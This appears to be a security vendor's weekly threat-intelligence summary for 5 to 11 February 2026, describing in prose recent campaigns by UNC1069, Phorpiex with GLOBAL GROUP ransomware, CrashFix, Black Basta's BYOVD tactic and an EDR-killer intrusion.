< Back
word map background

Tags:

Threat intelligence
11 February 2026

Weekly Summary Cyberattacks February 05-11

UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering  

The financially motivated threat actor UNC1069, assessed with high confidence to have a North Korea nexus, targeted the cryptocurrency and decentralized finance (DeFi) ecosystem in a tailored intrusion against a FinTech entity. The operation combined AI-enabled social engineering with a multi-stage macOS infection chain and unusually heavy tooling on a single host, resulting in the deployment of seven distinct malware families aimed at harvesting credentials, browser data, and session artifacts that could enable cryptocurrency theft and support future social engineering. 

Phorpiex Phishing Campaign Delivers GLOBAL GROUP Ransomware  

A high-volume phishing campaign leveraging the long-running Phorpiex malware has been observed delivering the GLOBAL GROUP ransomware through weaponised Windows Shortcut (.lnk) attachments. The campaign uses phishing emails with the subject line “Your Document,” a lure that has been widely abused in large-scale operations throughout 2024 and 2025. The emails contain an attachment masquerading as a legitimate Word document using a double extension (Document.doc.lnk), exploiting Windows default settings that hide known file extensions and relying on trusted document-style icons sourced from shell32.dll to reduce user suspicion. When the attachment is opened, the shortcut silently executes cmd.exe with embedded arguments, which in turn invokes PowerShell to perform a download-and-execute sequence without displaying any visible installer or user prompts. PowerShell retrieves a second-stage payload over HTTP or HTTPS from a remote server and writes it to disk under a system-like filename, such as windrv.exe, typically placed in user or system directories to blend in with legitimate Windows components. The payload is then executed via PowerShell or cmd.exe, completing the infection chain with minimal observable activity. In this campaign, Phorpiex ultimately facilitates the deployment of GLOBAL GROUP ransomware, a Ransomware-as-a-Service operation that emerged as a successor to the Mamona ransomware family. 

New Clickfix Variant ‘CrashFix’ Deploying Python Remote Access Trojan  

Microsoft Defender Experts reported a new evolution of the ongoing ClickFix campaign, tracked as CrashFix, which introduces deliberate browser-crashing behavior combined with social engineering to coerce victims into executing malicious commands. Unlike earlier ClickFix variants, CrashFix increases execution success by intentionally disrupting the user experience and presenting fake remediation prompts rather than relying on traditional exploit delivery. 

Black Basta: Defense Evasion Capability Embedded in Ransomware Payload  

A recent ransomware campaign linked to Black Basta revealed an unusual evolution in defense-evasion tradecraft, with a bring-your-own-vulnerable-driver (BYOVD) capability embedded directly inside the ransomware payload itself rather than delivered as a separate pre-encryption tool. In this activity, the ransomware dropped and attempted to load a vulnerable Windows kernel-mode driver, NSecKrnl, developed by NsecSoft, which was then exploited to terminate security-related processes before encryption occurred. This approach differs from the more common ransomware playbook, where a standalone defense-evasion tool is deployed ahead of the ransomware stage, and represents the first known instance of such bundling observed in Black Basta operations. 

EDR Killer Tool Uses Signed Kernel Driver From Forensic Software  

An intrusion in which threat actors used compromised SonicWall SSLVPN credentials to gain initial access to a victim network and attempted to disable endpoint security using a kernel-level EDR killer was detected. After authenticating to the VPN from malicious external IP addresses, the attackers conducted aggressive internal reconnaissance, including ICMP ping sweeps, NetBIOS name service probing, and SMB-focused activity that exhibited SYN flood behavior exceeding 370 SYN packets per second. During the intrusion, the attackers deployed a 64-bit Windows executable masquerading as a legitimate firmware update utility that functioned as an EDR killer.